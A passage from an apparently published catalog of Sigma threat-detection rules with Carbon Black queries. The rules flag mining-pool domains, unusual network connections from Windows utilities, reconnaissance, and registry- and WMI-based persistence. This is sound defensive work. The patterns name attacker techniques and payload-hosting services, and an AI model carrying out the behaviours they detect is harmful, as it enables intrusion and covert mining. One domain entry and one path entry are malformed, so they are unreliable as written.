            - 'miner.ppxxmr.com'
            - 'miner.rocks'
            - 'minercircle.com'
            - 'minergate.com'
            - 'minerpool.pw'
            - 'minerrocks.com'
            - 'miners.pro'
            - 'minerxmr.ru'
            - 'minexmr.cn'
            - 'minexmr.com'
            - 'mining-help.ru'
            - 'miningpoolhub.com'
            - 'mixpools.org'
            - 'moner.monerpool.org'
            - 'moner1min.monerpool.org'
            - 'monero-master.crypto-pool.fr'
            - 'monero.crypto-pool.fr'
            - 'monero.hashvault.pro'
            - 'monero.herominers.com'
            - 'monero.lindon-pool.win'
            - 'monero.miners.pro'
            - 'monero.riefly.id'
            - 'monero.us.to'
            - 'monerocean.stream'
            - 'monerogb.com'
            - 'monerohash.com'
            - 'moneroocean.stream'
            - 'moneropool.com'
            - 'moneropool.nl'
            - 'monerorx.com'
            - 'monerpool.org'
            - 'moriaxmr.com'
            - 'mro.pool.minergate.com'
            - 'multipool.us'
            - 'myxmr.pw'
            - 'na.luckpool.net'
            - 'nanopool.org'
            - 'nbminer.com'
            - 'node3.luckpool.net'
            - 'noobxmr.com'
            - 'pangolinminer.comgandalph3000.com'
            - 'pool.4i7i.com'
            - 'pool.armornetwork.org'
            - 'pool.cortins.tk'
            - 'pool.gntl.co.uk'
            - 'pool.hashvault.pro'
            - 'pool.minergate.com'
            - 'pool.minexmr.com'
            - 'pool.monero.hashvault.pro'
            - 'pool.ppxxmr.com'
            - 'pool.somec.cc'
            - 'pool.support'
            - 'pool.supportxmr.com'
            - 'pool.usa-138.com'
            - 'pool.xmr.pt'
            - 'pool.xmrfast.com'
            - 'pool2.armornetwork.org'
            - 'poolchange.ppxxmr.com'
            - 'pooldd.com'
            - 'poolmining.org'
            - 'poolto.be'
            - 'ppxvip1.ppxxmr.com'
            - 'ppxxmr.com'
            - 'prohash.net'
            - 'r.twotouchauthentication.online'
            - 'randomx.xmrig.com'
            - 'ratchetmining.com'
            - 'seed.emercoin.com'
            - 'seed.emercoin.net'
            - 'seed.emergate.net'
            - 'seed1.joulecoin.org'
            - 'seed2.joulecoin.org'
            - 'seed3.joulecoin.org'
            - 'seed4.joulecoin.org'
            - 'seed5.joulecoin.org'
            - 'seed6.joulecoin.org'
            - 'seed7.joulecoin.org'
            - 'seed8.joulecoin.org'
            - 'sg-aipg.miningocean.org'
            - 'sg-dynex.miningocean.org'
            - 'sg-neurai.miningocean.org'
            - 'sg-qrl.miningocean.org'
            - 'sg-upx.miningocean.org'
            - 'sg-zephyr.miningocean.org'
            - 'sg.minexmr.com'
            - 'sheepman.mine.bz'
            - 'siamining.com'
            - 'sumokoin.minerrocks.com'
            - 'supportxmr.com'
            - 'suprnova.cc'
            - 'teracycle.net'
            - 'trtl.cnpool.cc'
            - 'trtl.pool.mine2gether.com'
            - 'turtle.miner.rocks'
            - 'us-aipg.miningocean.org'
            - 'us-dynex.miningocean.org'
            - 'us-neurai.miningocean.org'
            - 'us-west.minexmr.com'
            - 'us-zephyr.miningocean.org'
            - 'usxmrpool.com'
            - 'viaxmr.com'
            - 'webservicepag.webhop.net'
            - 'xiazai.monerpool.org'
            - 'xiazai1.monerpool.org'
            - 'xmc.pool.minergate.com'
            - 'xmo.pool.minergate.com'
            - 'xmr-asia1.nanopool.org'
            - 'xmr-au1.nanopool.org'
            - 'xmr-eu1.nanopool.org'
            - 'xmr-eu2.nanopool.org'
            - 'xmr-jp1.nanopool.org'
            - 'xmr-us-east1.nanopool.org'
            - 'xmr-us-west1.nanopool.org'
            - 'xmr-us.suprnova.cc'
            - 'xmr-usa.dwarfpool.com'
            - 'xmr.2miners.com'
            - 'xmr.5b6b7b.ru'
            - 'xmr.alimabi.cn'
            - 'xmr.bohemianpool.com'
            - 'xmr.crypto-pool.fr'
            - 'xmr.crypto-pool.info'
            - 'xmr.f2pool.com'
            - 'xmr.hashcity.org'
            - 'xmr.hex7e4.ru'
            - 'xmr.ip28.net'
            - 'xmr.monerpool.org'
            - 'xmr.mypool.online'
            - 'xmr.nanopool.org'
            - 'xmr.pool.gntl.co.uk'
            - 'xmr.pool.minergate.com'
            - 'xmr.poolto.be'
            - 'xmr.ppxxmr.com'
            - 'xmr.prohash.net'
            - 'xmr.simka.pw'
            - 'xmr.somec.cc'
            - 'xmr.suprnova.cc'
            - 'xmr.usa-138.com'
            - 'xmr.vip.pool.minergate.com'
            - 'xmr1min.monerpool.org'
            - 'xmrf.520fjh.org'
            - 'xmrf.fjhan.club'
            - 'xmrfast.com'
            - 'xmrigcc.graef.in'
            - 'xmrminer.cc'
            - 'xmrpool.de'
            - 'xmrpool.eu'
            - 'xmrpool.me'
            - 'xmrpool.net'
            - 'xmrpool.xyz'
            - 'xx11m.monerpool.org'
            - 'xx11mv2.monerpool.org'
            - 'xxx.hex7e4.ru'
            - 'zarabotaibitok.ru'
            - 'zer0day.ru'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate Medium FP
Network Connection Initiated By AddinUtil.EXE
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
status test author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) ATT&CK technique id 5205613d-2a63-4412-a895-3a2458b587b3
carbon_black query
Initiated:true Image:\\addinutil.exe
view Sigma YAML
title: Network Connection Initiated By AddinUtil.EXE
id: 5205613d-2a63-4412-a895-3a2458b587b3
status: test
description: |
    Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
    This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
references:
    - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023-09-18
modified: 2024-07-16
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\addinutil.exe'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
Network Connection Initiated By Eqnedt32.EXE
Detects network connections from the Equation Editor process "eqnedt32.exe".
status test author Max Altgelt (Nextron Systems) ATT&CK technique id a66bc059-c370-472c-a0d7-f8fd1bf9d583
carbon_black query
Image:\\eqnedt32.exe
view Sigma YAML
title: Network Connection Initiated By Eqnedt32.EXE
id: a66bc059-c370-472c-a0d7-f8fd1bf9d583
status: test
description: Detects network connections from the Equation Editor process "eqnedt32.exe".
references:
    - https://twitter.com/forensicitguy/status/1513538712986079238
    - https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/
    - https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/
author: Max Altgelt (Nextron Systems)
date: 2022-04-14
modified: 2024-05-31
tags:
    - attack.execution
    - attack.t1203
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\eqnedt32.exe'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Strong Medium FP
Network Connection Initiated By IMEWDBLD.EXE
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
status test author frack113 ATT&CK technique id 8d7e392e-9b28-49e1-831d-5949c6281228
carbon_black query
Initiated:true Image:\\IMEWDBLD.exe
view Sigma YAML
title: Network Connection Initiated By IMEWDBLD.EXE
id: 8d7e392e-9b28-49e1-831d-5949c6281228
related:
    - id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
      type: derived
status: test
description: |
    Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download
    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
author: frack113
date: 2022-01-22
modified: 2023-11-09
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\IMEWDBLD.exe'
    condition: selection
falsepositives:
    - Unknown
# Note: Please reduce this to medium if you find legitimate connections
level: high
Convert to SIEM query
high Moderate Medium FP
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
status test author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 7b434893-c57d-4f41-908d-6a17bf1ae98f
carbon_black query
(Initiated:true (Image:\:\\$Recycle.bin* OR Image:\:\\Perflogs\\* OR Image:\:\\Temp\\* OR Image:\:\\Users\\Default\\* OR Image:\:\\Users\\Public\\* OR Image:\:\\Windows\\Fonts\\* OR Image:\:\\Windows\\IME\\* OR Image:\:\\Windows\\System32\\Tasks\\* OR Image:\:\\Windows\\Tasks\\* OR Image:\\config\\systemprofile\\* OR Image:\\Contacts\\* OR Image:\\Favorites\\* OR Image:\\Favourites\\* OR Image:\\Music\\* OR Image:\\Pictures\\* OR Image:\\Videos\\* OR Image:\\Windows\\addins\\*)) (-(DestinationHostname:.githubusercontent.com OR DestinationHostname:anonfiles.com OR DestinationHostname:cdn.discordapp.com OR DestinationHostname:ddns.net OR DestinationHostname:dl.dropboxusercontent.com OR DestinationHostname:ghostbin.co OR DestinationHostname:github.com OR DestinationHostname:glitch.me OR DestinationHostname:gofile.io OR DestinationHostname:hastebin.com OR DestinationHostname:mediafire.com OR DestinationHostname:mega.co.nz OR DestinationHostname:mega.nz OR DestinationHostname:onrender.com OR DestinationHostname:pages.dev OR DestinationHostname:paste.ee OR DestinationHostname:pastebin.com OR DestinationHostname:pastebin.pl OR DestinationHostname:pastetext.net OR DestinationHostname:portmap.io OR DestinationHostname:privatlab.com OR DestinationHostname:privatlab.net OR DestinationHostname:send.exploit.in OR DestinationHostname:sendspace.com OR DestinationHostname:storage.googleapis.com OR DestinationHostname:storjshare.io OR DestinationHostname:supabase.co OR DestinationHostname:temp.sh OR DestinationHostname:transfer.sh OR DestinationHostname:trycloudflare.com OR DestinationHostname:ufile.io OR DestinationHostname:w3spaces.com OR DestinationHostname:workers.dev))
view Sigma YAML
title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
status: test
description: |
    Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
references:
    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-03-19
modified: 2025-12-10
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|contains:
            - ':\$Recycle.bin'
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Fonts\'
            - ':\Windows\IME\'
            - ':\Windows\System32\Tasks\'
            - ':\Windows\Tasks\'
            - '\config\systemprofile\'
            - '\Contacts\'
            - '\Favorites\'
            - '\Favourites\'
            - '\Music\'
            - '\Pictures\'
            - '\Videos\'
            - '\Windows\addins\'
    filter_main_domains:
        # Note: We exclude these domains to avoid duplicate filtering from e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
        DestinationHostname|endswith:
            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
            - 'anonfiles.com'
            - 'cdn.discordapp.com'
            - 'ddns.net'
            - 'dl.dropboxusercontent.com'
            - 'ghostbin.co'
            - 'github.com'
            - 'glitch.me'
            - 'gofile.io'
            - 'hastebin.com'
            - 'mediafire.com'
            - 'mega.co.nz'
            - 'mega.nz'
            - 'onrender.com'
            - 'pages.dev'
            - 'paste.ee'
            - 'pastebin.com'
            - 'pastebin.pl'
            - 'pastetext.net'
            - 'portmap.io'  # https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2
            - 'privatlab.com'
            - 'privatlab.net'
            - 'send.exploit.in'
            - 'sendspace.com'
            - 'storage.googleapis.com'
            - 'storjshare.io'
            - 'supabase.co'
            - 'temp.sh'
            - 'transfer.sh'
            - 'trycloudflare.com'
            - 'ufile.io'
            - 'w3spaces.com'
            - 'workers.dev'
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Medium FP
Network Connection Initiated Via Notepad.EXE
Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
status test author EagleEye Team ATT&CK technique id e81528db-fc02-45e8-8e98-4e84aba1f10b
carbon_black query
Image:\\notepad.exe (-DestinationPort:9100)
view Sigma YAML
title: Network Connection Initiated Via Notepad.EXE
id: e81528db-fc02-45e8-8e98-4e84aba1f10b
status: test
description: |
    Detects a network connection that is initiated by the "notepad.exe" process.
    This might be a sign of process injection from a beacon process or something similar.
    Notepad rarely initiates a network communication except when printing documents for example.
references:
    - https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf
    - https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet
author: EagleEye Team
date: 2020-05-14
modified: 2024-02-02
tags:
    - attack.privilege-escalation
    - attack.command-and-control
    - attack.execution
    - attack.stealth
    - attack.t1055
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\notepad.exe'
    filter_optional_printing:
        DestinationPort: 9100
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Printing documents via notepad might cause communication with the printer via port 9100 or similar.
level: high
Convert to SIEM query
high Moderate Medium FP
Network Connection Initiated via Finger.EXE
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server. Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion. Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
status experimental author Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 2fdaf50b-9fd5-449f-ba69-f17248119af6
carbon_black query
Initiated:true Image:\\finger.exe
view Sigma YAML
title: Network Connection Initiated via Finger.EXE
id: 2fdaf50b-9fd5-449f-ba69-f17248119af6
related:
    - id: c082c2b0-525b-4dbc-9a26-a57dc4692074
      type: similar
    - id: af491bca-e752-4b44-9c86-df5680533dbc
      type: similar
status: experimental
description: |
    Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
    In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
    Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
    Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
references:
    - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
    - attack.command-and-control
    - attack.t1071.004
    - attack.execution
    - attack.t1059.003
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
high Moderate High FP
Network Reconnaissance Activity
Detects a set of suspicious network related commands often used in recon stages
status test author Florian Roth (Nextron Systems) ATT&CK technique id e6313acd-208c-44fc-a0ff-db85d572e90e
carbon_black query
CommandLine:nslookup* CommandLine:_ldap._tcp.dc._msdcs.*
view Sigma YAML
title: Network Reconnaissance Activity
id: e6313acd-208c-44fc-a0ff-db85d572e90e
status: test
description: Detects a set of suspicious network related commands often used in recon stages
references:
    - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
author: Florian Roth (Nextron Systems)
date: 2022-02-07
tags:
    - attack.discovery
    - attack.t1087
    - attack.t1082
    - car.2016-03-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'nslookup'
            - '_ldap._tcp.dc._msdcs.'
    condition: selection
falsepositives:
    - False positives depend on scripts and administrative tools used in the monitored environment
level: high
Convert to SIEM query
high Moderate High FP
New ActiveScriptEventConsumer Created Via Wmic.EXE
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id ebef4391-1a81-4761-a40a-1db446c0e625
carbon_black query
CommandLine:ActiveScriptEventConsumer* CommandLine:\ CREATE\ *
view Sigma YAML
title: New ActiveScriptEventConsumer Created Via Wmic.EXE
id: ebef4391-1a81-4761-a40a-1db446c0e625
status: test
description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
references:
    - https://twitter.com/johnlatwc/status/1408062131321270282?s=12
    - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
author: Florian Roth (Nextron Systems)
date: 2021-06-25
modified: 2023-02-14
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'ActiveScriptEventConsumer'
            - ' CREATE '
    condition: selection
falsepositives:
    - Legitimate software creating script event consumers
level: high
Convert to SIEM query
high Moderate Medium FP
New Country
Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
status test author Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo' ATT&CK technique id adf9f4d2-559e-4f5c-95be-c28dff0b1476
carbon_black query
riskEventType:newCountry
view Sigma YAML
title: New Country
id: adf9f4d2-559e-4f5c-95be-c28dff0b1476
status: test
description: Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
    - attack.stealth
    - attack.t1078
    - attack.persistence
    - attack.privilege-escalation
    - attack.initial-access
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'newCountry'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high
Convert to SIEM query
high Moderate High FP
New DNS ServerLevelPluginDll Installed
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id e61e8a88-59a9-451c-874e-70fcc9740d67
carbon_black query
TargetObject:\\services\\DNS\\Parameters\\ServerLevelPluginDll
view Sigma YAML
title: New DNS ServerLevelPluginDll Installed
id: e61e8a88-59a9-451c-874e-70fcc9740d67
related:
    - id: cbe51394-cd93-4473-b555-edf0144952d9
      type: derived
    - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
      type: derived
status: test
description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
references:
    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
author: Florian Roth (Nextron Systems)
date: 2017-05-08
modified: 2023-08-17
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.defense-impairment
    - attack.t1574.001
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: '\services\DNS\Parameters\ServerLevelPluginDll'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate High FP
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
status test author Florian Roth (Nextron Systems) ATT&CK sub-technique id f63b56ee-3f79-4b8a-97fb-5c48007e8573
carbon_black query
Image:\\dnscmd.exe (CommandLine:\/config* CommandLine:\/serverlevelplugindll*)
view Sigma YAML
title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
id: f63b56ee-3f79-4b8a-97fb-5c48007e8573
related:
    - id: e61e8a88-59a9-451c-874e-70fcc9740d67
      type: derived
    - id: cbe51394-cd93-4473-b555-edf0144952d9
      type: derived
status: test
description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
references:
    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
    - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
author: Florian Roth (Nextron Systems)
date: 2017-05-08
modified: 2023-02-05
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.defense-impairment
    - attack.t1574.001
    - attack.t1112
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\dnscmd.exe'
        CommandLine|contains|all:
            - '/config'
            - '/serverlevelplugindll'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
New File Association Using Exefile
Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
status test author Andreas Hunkeler (@Karneades) ATT&CK tactic-only id 44a22d59-b175-4f13-8c16-cbaef5b581ff
carbon_black query
TargetObject:Classes\\.* Details:exefile
view Sigma YAML
title: New File Association Using Exefile
id: 44a22d59-b175-4f13-8c16-cbaef5b581ff
status: test
description: Detects the abuse of the exefile handler in new file association. Used for bypass of security products.
references:
    - https://twitter.com/mrd0x/status/1461041276514623491
author: Andreas Hunkeler (@Karneades)
date: 2021-11-19
modified: 2023-08-17
tags:
    - attack.stealth
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: 'Classes\.'
        Details: 'exefile'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Low FP
New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
status test author frack113 ATT&CK sub-technique id 9e2575e7-2cb9-4da1-adc8-ed94221dca5e
carbon_black query
((EventID:2004 OR EventID:2071 OR EventID:2097) (ApplicationPath:\:\\PerfLogs\\* OR ApplicationPath:\:\\Temp\\* OR ApplicationPath:\:\\Tmp\\* OR ApplicationPath:\:\\Users\\Public\\* OR ApplicationPath:\:\\Windows\\Tasks\\* OR ApplicationPath:\:\\Windows\\Temp\\* OR ApplicationPath:\\AppData\\Local\\Temp\\*)) (-Action:2)
view Sigma YAML
title: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application
id: 9e2575e7-2cb9-4da1-adc8-ed94221dca5e
related:
    - id: cde0a575-7d3d-4a49-9817-b8004a7bf105
      type: derived
status: test
description: Detects the addition of a new rule to the Windows Firewall exception list for an application located in a potentially suspicious location.
references:
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
    - https://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#
author: frack113
date: 2023-02-26
modified: 2024-05-10
tags:
    - attack.defense-impairment
    - attack.t1686.003
logsource:
    product: windows
    service: firewall-as
detection:
    selection:
        EventID:
            - 2004 # A rule has been added to the Windows Defender Firewall exception list. (Windows 10)
            - 2071 # A rule has been added to the Windows Defender Firewall exception list. (Windows 11)
            - 2097
        ApplicationPath|contains:
            - ':\PerfLogs\'
            - ':\Temp\'
            - ':\Tmp\'
            - ':\Users\Public\'
            - ':\Windows\Tasks\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
    filter_main_block:
        Action: 2 # Block
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
New Netsh Helper DLL Registered From A Suspicious Location
Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK sub-technique id e7b18879-676e-4a0e-ae18-27039185a8e7
carbon_black query
TargetObject:\\SOFTWARE\\Microsoft\\NetSh* ((Details:\:\\Perflogs\\* OR Details:\:\\Users\\Public\\* OR Details:\:\\Windows\\Temp\\* OR Details:\\AppData\\Local\\Temp\\* OR Details:\\Temporary\ Internet*) OR ((Details:\:\\Users\\* Details:\\Favorites\\*) OR (Details:\:\\Users\\* Details:\\Favourites\\*) OR (Details:\:\\Users\\* Details:\\Contacts\\*) OR (Details:\:\\Users\\* Details:\\Pictures\\*)))
view Sigma YAML
title: New Netsh Helper DLL Registered From A Suspicious Location
id: e7b18879-676e-4a0e-ae18-27039185a8e7
related:
    - id: 56321594-9087-49d9-bf10-524fe8479452
      type: similar
    - id: c90362e0-2df3-4e61-94fe-b37615814cb1
      type: similar
status: test
description: |
    Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
references:
    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll
    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-11-28
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.007
logsource:
    category: registry_set
    product: windows
detection:
    selection_target:
        TargetObject|contains: '\SOFTWARE\Microsoft\NetSh'
    selection_folders_1:
        Details|contains:
            - ':\Perflogs\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\Temporary Internet'
    selection_folders_2:
        - Details|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - Details|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: selection_target and 1 of selection_folders_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Medium FP
New RUN Key Pointing to Suspicious Folder
Detects suspicious new RUN key element pointing to an executable in a suspicious folder
status experimental author Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems) ATT&CK sub-technique id 02ee49e2-e294-4d0f-9278-f5b3212fc588
carbon_black query
(TargetObject:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run* OR TargetObject:\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run* OR TargetObject:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run*) ((Details:\:\\Perflogs* OR Details:\:\\ProgramData'* OR Details:\:\\Windows\\Temp* OR Details:\:\\Temp* OR Details:\\AppData\\Local\\Temp* OR Details:\\AppData\\Roaming* OR Details:\:\\$Recycle.bin* OR Details:\:\\Users\\Default* OR Details:\:\\Users\\public* OR Details:%temp%* OR Details:%tmp%* OR Details:%Public%* OR Details:%AppData%*) OR (Details:\:\\Users\\* (Details:\\Favorites* OR Details:\\Favourites* OR Details:\\Contacts* OR Details:\\Music* OR Details:\\Pictures* OR Details:\\Documents* OR Details:\\Photos*))) (-(TargetObject:\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\* Image:C\:\\Windows\\SoftwareDistribution\\Download\\* (Details:rundll32.exe\ * Details:C\:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32*) (Details:\\AppData\\Local\\Temp\\* OR Details:C\:\\Windows\\Temp\\*))) (-((Image:C\:\\Program\ Files\\Spotify\\Spotify.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Spotify\\Spotify.exe OR Image:\\AppData\\Roaming\\Spotify\\Spotify.exe) TargetObject:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Spotify Details:Spotify.exe\ \-\-autostart\ \-\-minimized))
view Sigma YAML
title: New RUN Key Pointing to Suspicious Folder
id: 02ee49e2-e294-4d0f-9278-f5b3212fc588
status: experimental
description: Detects suspicious new RUN key element pointing to an executable in a suspicious folder
references:
    - https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2018-08-25
modified: 2025-10-06
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_set
    product: windows
detection:
    selection_target:
        TargetObject|contains:
            - '\Software\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
            - '\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
    selection_suspicious_paths_1:
        Details|contains:
            - ':\Perflogs'
            - :\ProgramData'
            - ':\Windows\Temp'
            - ':\Temp'
            - '\AppData\Local\Temp'
            - '\AppData\Roaming'
            - ':\$Recycle.bin'
            - ':\Users\Default'
            - ':\Users\public'
            - '%temp%'
            - '%tmp%'
            - '%Public%'
            - '%AppData%'
    selection_suspicious_paths_user_1:
        Details|contains: ':\Users\'
    selection_suspicious_paths_user_2:
        Details|contains:
            - '\Favorites'
            - '\Favourites'
            - '\Contacts'
            - '\Music'
            - '\Pictures'
            - '\Documents'
            - '\Photos'
    filter_main_windows_update:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\'
        Image|startswith: 'C:\Windows\SoftwareDistribution\Download\'
        Details|contains|all:
            - 'rundll32.exe '
